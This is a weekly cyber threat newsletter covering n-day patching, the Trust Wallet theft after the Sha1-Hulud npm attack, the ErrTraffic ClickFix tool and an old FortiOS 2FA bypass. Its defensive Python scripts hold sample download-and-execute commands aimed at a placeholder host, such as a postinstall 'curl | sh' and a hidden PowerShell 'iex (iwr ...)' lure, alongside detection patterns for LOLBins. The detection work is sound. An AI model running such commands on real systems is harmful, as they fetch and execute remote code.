Cyber Threat Weekly – #110
During the week of December 29th through January 4th, around 142 cyber news articles were reviewed. It was a very light week for cyber threat trends and adversarial behavior news, so I've been thinking about the principle of resiliency.
Resilience covers a lot: understanding your critical business processes and having a plan for when systems or processes fail. Business continuity: if ransomware takes out 70% of your systems, how do you keep operating? Disaster recovery: immutable backups, with restoration tested and timed so you know how long recovery actually takes. And a response plan for both natural disasters and man-made ones, whether ransomware or simple mistakes that lead to downtime or data loss.
Let's start with an apparent deception operation that might have nabbed a criminal. Last month's npm supply chain attack has led to crypto theft. A new automated ClickFix tool. A Chinese threat actor abusing browser extensions.
A five-year-old Fortinet FortiOS bug is being abused again.
Broken Record Alert: Don’t get pwned by N-day vulnerabilities!!!
Known exploited software flaws are one of the top four initial access vectors, and their use has increased sharply in recent months. We continue to share n-day vulnerabilities that are being actively exploited. Priority #1: start with the CISA and VulnCheck known exploited vulnerability (KEV) catalogs. If it's in a catalog, it should be patched.
A close #2 priority is flaws with weaponized proof-of-concept (PoC) code available; the chance of exploitation is higher once weaponized PoC code is public. If you do nothing else with patching, have an emergency 24-to-48-hour patching process for vulnerabilities that are actively exploited or have weaponized PoC code available.
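The two-tier rule above (KEV first, weaponized PoC second, everything else on the normal cadence) is easy to automate. The script below is an added example written for this newsletter, not code from CISA, VulnCheck or the author. It follows the real field names of CISA's known_exploited_vulnerabilities.json feed (cveID, dateAdded, dueDate, knownRansomwareCampaignUse), but the catalog excerpt, the weaponized-PoC list and the scan findings are constructed sample data with made-up dates, and the CVE-2099-* identifiers are placeholders rather than real vulnerabilities. It also pulls Internet-exposed hosts to the front of each tier, which is the exposure point made later in this section.

```python
"""Rank scan findings by exploitation evidence: CISA KEV first, weaponized PoC second.

Added example for this newsletter, not code from CISA, VulnCheck or the author.
KEV_SAMPLE follows the real schema of CISA's known_exploited_vulnerabilities.json
feed but is constructed data with made-up dates; KNOWN_WEAPONIZED and FINDINGS are
constructed inputs too (CVE-2099-* IDs are placeholders, not real vulnerabilities).
"""
import json
import urllib.request
from datetime import date

KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed excerpt in the KEV feed's schema (CVE IDs from the newsletter, dates made up).
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2025-14847", "vendorProject": "MongoDB", "product": "MongoDB Server",
         "dateAdded": "2026-01-02", "dueDate": "2026-01-23",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2020-12812", "vendorProject": "Fortinet", "product": "FortiOS",
         "dateAdded": "2021-06-01", "dueDate": "2021-07-01",
         "knownRansomwareCampaignUse": "Known"},
    ],
})

# Assumed input: CVEs your own intel feed marks as having public weaponized PoC code.
KNOWN_WEAPONIZED = {"CVE-2099-0002"}

# Constructed scan output: host, CVE and whether the host is reachable from the Internet.
FINDINGS = [
    {"host": "db01", "cve": "cve-2025-14847", "internet_exposed": False},
    {"host": "fw01", "cve": "CVE-2020-12812", "internet_exposed": True},
    {"host": "app02", "cve": "CVE-2099-0002", "internet_exposed": True},
    {"host": "app03", "cve": "CVE-2099-0003", "internet_exposed": False},
]


def fetch_kev() -> dict:
    """Download the live CISA catalog (needs network; not used by the sample run)."""
    with urllib.request.urlopen(KEV_URL, timeout=30) as resp:
        return json.load(resp)


def index_kev(catalog: dict) -> dict:
    """Map upper-cased CVE ID -> catalog entry for O(1) lookups."""
    return {v["cveID"].upper(): v for v in catalog["vulnerabilities"]}


def prioritise(findings, kev_index, weaponized, today):
    """Tier 1 = in KEV, tier 2 = weaponized PoC public, tier 3 = everything else.
    Within a tier, Internet-exposed hosts sort first."""
    weaponized = {w.upper() for w in weaponized}
    ranked = []
    for f in findings:
        cve = f["cve"].upper()          # scanners disagree on case; normalise once
        entry = kev_index.get(cve)
        if entry is not None:
            tier = 1
            reason = f"CISA KEV (added {entry['dateAdded']}, due {entry['dueDate']})"
            if entry.get("knownRansomwareCampaignUse") == "Known":
                reason += ", known ransomware use"
            if today > date.fromisoformat(entry["dueDate"]):
                reason += ", OVERDUE"
        elif cve in weaponized:
            tier, reason = 2, "weaponized PoC public"
        else:
            tier, reason = 3, "no known exploitation; normal patch cadence"
        ranked.append({**f, "cve": cve, "tier": tier, "reason": reason})
    ranked.sort(key=lambda r: (r["tier"], not r["internet_exposed"], r["cve"]))
    return ranked


def emergency_window(ranked):
    """CVEs that belong in the 24-to-48-hour emergency patch process."""
    return [r["cve"] for r in ranked if r["tier"] <= 2]


def run_sample(today=date(2026, 1, 5)):
    """Run the ranking over the constructed data (swap in fetch_kev() for real use)."""
    return prioritise(FINDINGS, index_kev(json.loads(KEV_SAMPLE)), KNOWN_WEAPONIZED, today)


if __name__ == "__main__":
    ranked = run_sample()
    for r in ranked:
        print(f"P{r['tier']} {r['host']:<6} {r['cve']:<15} {r['reason']}")
    print("emergency window:", ", ".join(emergency_window(ranked)))
```

In production, replace the constructed catalog with `index_kev(fetch_kev())` and feed the script your scanner's export; the OVERDUE flag against CISA's dueDate is a useful metric to report upward, because it shows how far behind the federal remediation deadline you are.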
VPN gateways from all vendors are under constant attack.
Consider what is exposed to the Internet. Architecture and zero trust network access (ZTNA) go a long way toward minimizing the number of devices and services exposed to the Internet.
CISA Known Exploited Vulnerabilities – December 29th to January 4th:
CVE-2025-14847 – MongoDB and MongoDB Server Improper Handling of Length Parameter Inconsistency Vulnerability:
This bug may allow an unauthenticated client to read uninitialized heap memory.
Deception Operations? Criminals claim Resecurity Hacked
The Shiny Lapsus$ Hunters threat actors claim to have fully compromised Resecurity in retaliation. Resecurity says it set up a honey account within an isolated environment to monitor the attackers, and that several operational security failures were observed and shared with law enforcement.
API Key Stolen via Sha1-Hulud Attack Leads to Crypto Theft
Trust Wallet believes its GitHub secrets were exposed during the Sha1-Hulud supply chain attack against the npm registry, which gave the attacker access to its browser extension source code and its Chrome Web Store API key. The attacker registered the metrics-trustwallet.com domain and a subdomain. Roughly $8.5 million in crypto was stolen. It isn't easy, but when an attack happens that could have reached your systems, verifying you are not affected should be a priority.
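One concrete way to start that verification, as an added example written for this newsletter (not Trust Wallet's, npm's or the author's code): walk the installed node_modules tree, report every package that runs code at install time, and cross-check against an indicator list. It relies only on documented npm behaviour, namely that the preinstall, install, postinstall and prepare entries under "scripts" in package.json execute during `npm install`, which is the hook npm worms use to run on developer and CI machines. The IOC list is an assumed input with placeholder names, and the node_modules tree is constructed in a temp directory so the script runs offline.

```python
"""Find packages in node_modules that run code at install time, and match them against IOCs.

Added example for this newsletter, not Trust Wallet's or npm's code. KNOWN_BAD is an
assumed IOC list with placeholder names; build_sample_tree() writes a constructed
node_modules tree so the audit runs offline. example.invalid is a reserved placeholder domain.
"""
import json
import tempfile
from pathlib import Path

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed input: (name, version) pairs from your IOC feed for the campaign. Placeholders.
KNOWN_BAD = {("example-compromised-pkg", "1.2.3")}

# Hook commands that fetch, decode or spawn shells deserve a look even without an IOC match.
SUSPICIOUS = ("curl ", "wget ", "http://", "https://", "node -e", "eval(",
              "bash -c", "| sh", "| bash", "powershell", "base64")


def _is_package_root(pkg_json: Path) -> bool:
    """True for node_modules/<name>/package.json or node_modules/@scope/<name>/package.json."""
    pkg_dir = pkg_json.parent
    if pkg_dir.parent.name == "node_modules":
        return True
    return pkg_dir.parent.name.startswith("@") and pkg_dir.parent.parent.name == "node_modules"


def audit(node_modules: Path, known_bad=KNOWN_BAD):
    """Return packages with install-time hooks or IOC matches, most worrying first."""
    findings = []
    for pkg_json in node_modules.rglob("package.json"):
        if not _is_package_root(pkg_json):
            continue                      # skip manifests nested in src/, test/, fixtures
        try:
            manifest = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        name, version = manifest.get("name", "?"), manifest.get("version", "?")
        scripts = manifest.get("scripts") or {}
        hooks = {h: str(scripts[h]) for h in INSTALL_HOOKS if h in scripts}
        ioc_match = (name, version) in known_bad
        if not hooks and not ioc_match:
            continue
        suspicious = [h for h, cmd in hooks.items() if any(s in cmd.lower() for s in SUSPICIOUS)]
        findings.append({"package": f"{name}@{version}", "hooks": hooks,
                         "suspicious_hooks": suspicious, "ioc_match": ioc_match,
                         "path": str(pkg_json.parent)})
    # IOC matches first, then suspicious hook commands, then benign-looking hooks (native builds).
    findings.sort(key=lambda f: (not f["ioc_match"], not f["suspicious_hooks"], f["package"]))
    return findings


def build_sample_tree() -> Path:
    """Write a constructed node_modules tree to a temp dir and return its path."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    manifests = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0",
                         "scripts": {"test": "node test.js"}},
        "native-addon": {"name": "native-addon", "version": "2.0.0",
                         "scripts": {"install": "node-gyp rebuild"}},
        "@acme/telemetry": {"name": "@acme/telemetry", "version": "0.1.0",
                            "scripts": {"postinstall": "curl -s https://example.invalid/s | sh"}},
        "example-compromised-pkg": {"name": "example-compromised-pkg", "version": "1.2.3",
                                    "scripts": {"preinstall": "node install-helper.js"}},
    }
    for rel, manifest in manifests.items():
        pkg_dir = root / rel
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    # A nested fixture manifest that must NOT be reported as a package.
    fixture = root / "left-pad-ish" / "test" / "fixtures"
    fixture.mkdir(parents=True)
    (fixture / "package.json").write_text(
        '{"name": "fixture", "scripts": {"postinstall": "curl https://example.invalid"}}')
    return root


if __name__ == "__main__":
    for f in audit(build_sample_tree()):
        flag = "IOC" if f["ioc_match"] else ("SUSPICIOUS" if f["suspicious_hooks"] else "review")
        print(f"[{flag:10}] {f['package']}: {f['hooks']}")
```

Run it against a real checkout with `audit(Path("node_modules"))`. Legitimate native modules will show up in the "review" bucket because of `node-gyp rebuild`; that is expected, and the point is that the list is short enough to read. Pair the audit with `npm config set ignore-scripts true` on CI runners, so a compromised package cannot run at install time in the first place, and rotate any secret that was present in the environment of a build that installed a flagged package.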
ClickFix Automated Tool Called ErrTraffic
This tool works on either attacker-controlled or legitimate-but-compromised websites. The site behaves normally for everyone except targeted victims, which makes it stealthy. Targets see a page that looks corrupted, shows system font errors, or carries another lure. It's multi-OS capable, covering Android, macOS, Windows, and Linux.
https://www.infostealers.com/article/the-industrialization-of-clickfix-inside-errtraffic/
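Because the lure page itself looks clean to everyone but the target, the reliable place to catch ClickFix on Windows is the endpoint artifact it leaves behind. The script below is an added example written for this newsletter, not code from the ErrTraffic analysis or from the author. It relies on the general ClickFix pattern that the write-up above does not spell out: the lure gets the victim to paste a clipboard command into the Win+R Run dialog, and Windows records every Run dialog command under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, each value with a trailing "\1" and ordered by the MRUList value. SAMPLE_RUNMRU is constructed, the indicator weights are my own choice, and example.invalid is a reserved placeholder domain.

```python
"""Flag ClickFix-style commands in the Windows Run dialog history (the RunMRU registry key).

Added example for this newsletter, not code from the ErrTraffic analysis or the author.
SAMPLE_RUNMRU is constructed; the indicator weights are assumptions, not a published rule.
"""
import re

RUNMRU_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed RunMRU contents. MRUList lists slots most-recent-first; each value ends in "\1".
SAMPLE_RUNMRU = {
    "MRUList": "cdab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": ('powershell -w hidden -c "iex (iwr http://example.invalid/verify)" '
          '# I am not a robot - reCAPTCHA Verification ID: 8421\\1'),
    "d": "cmd /c curl -o %TEMP%\\x.exe http://example.invalid/x && %TEMP%\\x.exe\\1",
}

# Weighted indicator classes; a real ClickFix paste usually hits three or four of them.
INDICATORS = (
    ("lolbin", 2, re.compile(
        r"\b(?:powershell|pwsh|mshta|cmd(?:\.exe)?\s*/[ck]|rundll32|regsvr32|certutil"
        r"|bitsadmin|curl|msiexec|wscript|cscript)\b", re.I)),
    ("download-or-eval", 2, re.compile(
        r"https?://|\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression"
        r"|frombase64string|\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("stealth-flags", 1, re.compile(
        r"-w(?:indowstyle)?\s+h(?:idden)?\b|-nop\b|-noprofile\b|-ep\s+bypass"
        r"|-executionpolicy\s+bypass", re.I)),
    ("lure-text", 2, re.compile(
        r"not a robot|captcha|verification|verify you are human", re.I)),
)


def parse_runmru(values: dict):
    """Yield (slot, command) most-recent-first, stripping the '\\1' suffix Windows appends."""
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        yield slot, raw[:-2] if raw.endswith("\\1") else raw


def score(command: str):
    """Return (score, matched indicator names) for one Run dialog command."""
    total, hits = 0, []
    for name, weight, rx in INDICATORS:
        if rx.search(command):
            total += weight
            hits.append(name)
    return total, hits


def detect(values: dict, threshold: int = 4):
    """Alerts for entries at or above threshold (a LOLBin plus a download alone reaches it)."""
    alerts = []
    for slot, cmd in parse_runmru(values):
        total, hits = score(cmd)
        if total >= threshold:
            alerts.append({"slot": slot, "score": total, "indicators": hits, "command": cmd})
    return alerts


def read_live_runmru() -> dict:
    """Read the current user's RunMRU on Windows (winreg is stdlib there, absent elsewhere)."""
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_SUBKEY) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, data, _type = winreg.EnumValue(key, i)
            values[name] = data
    return values


if __name__ == "__main__":
    for a in detect(SAMPLE_RUNMRU):
        print(f"slot {a['slot']} score {a['score']} {a['indicators']}: {a['command'][:80]}")
```

On a live Windows host, `detect(read_live_runmru())` gives you the same result from the registry; at fleet scale the equivalent telemetry is the Run dialog's process tree (explorer.exe spawning powershell.exe, cmd.exe or mshta.exe with a download in the command line), which your EDR will already be collecting. The macOS and Linux variants of the lure paste into a terminal instead, so shell history is the matching artifact there.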
Browser Extensions Abused by Chinese Threat Actors
Tracked as DarkSpectre, this threat actor's latest campaign, Zoom Stealer, collects online meeting data such as URLs and meeting IDs. The data is exfiltrated via WebSocket and streamed in real time. It is one of three active campaigns; this threat actor plays the long game.
www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers
Fortinet FortiOS Bug CVE-2020-12812 Once Again Exploited
The company is warning that attackers are abusing this bug again. It is a 2FA bypass in the SSL VPN: an attacker who already has a valid password can log in without being prompted for the second factor by changing the case of the username. A mitigation is available. It has become obvious that an Internet-exposed VPN gateway is no longer a good option; looking at a zero trust network access solution should be a high priority.
https://www.securityweek.com/fortinet-warns-of-new-attacks-exploiting-old-vulnerability/
31337 InfoSec - Cyber Threat Weekly - Derek Krein Newsletter